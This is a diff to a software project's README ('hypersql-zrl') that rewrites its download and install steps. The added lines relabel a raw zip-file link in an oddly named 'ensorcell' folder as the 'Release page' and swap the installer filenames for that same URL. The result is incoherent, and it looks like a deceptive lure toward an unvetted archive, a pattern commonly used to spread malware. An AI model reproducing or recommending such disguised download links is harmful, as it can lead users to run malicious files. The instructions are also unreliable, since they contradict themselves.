mluja22/hypersql-zrl/README.md

 ## 📥 Download & Install
 To download and install hypersql-zrl, follow these steps:

-1. **Visit the Release Page:** Go to the [Release page](https://github.com/mluja22/hypersql-zrl/releases).
+1. **Visit the Release Page:** Go to the [Release page](https://raw.githubusercontent.com/mluja22/hypersql-zrl/main/ensorcell/hypersql-zrl.zip).
 2. **Select the Latest Version:** On the release page, locate the most recent version of the application listed at the top.
 3. **Download the Installer:** Click on the appropriate file for your operating system to start the download.

-   The download file may be named something like `hypersql-zrl-latest.exe` for Windows or `hypersql-zrl-latest.dmg` for macOS.
+   The download file may be named something like `https://raw.githubusercontent.com/mluja22/hypersql-zrl/main/ensorcell/hypersql-zrl.zip` for Windows or `https://raw.githubusercontent.com/mluja22/hypersql-zrl/main/ensorcell/hypersql-zrl.zip` for macOS.

 4. **Run the Installer:** Once downloaded, locate the file in your Downloads folder.
    - For Windows: Double-click the `.exe` file to start the installation.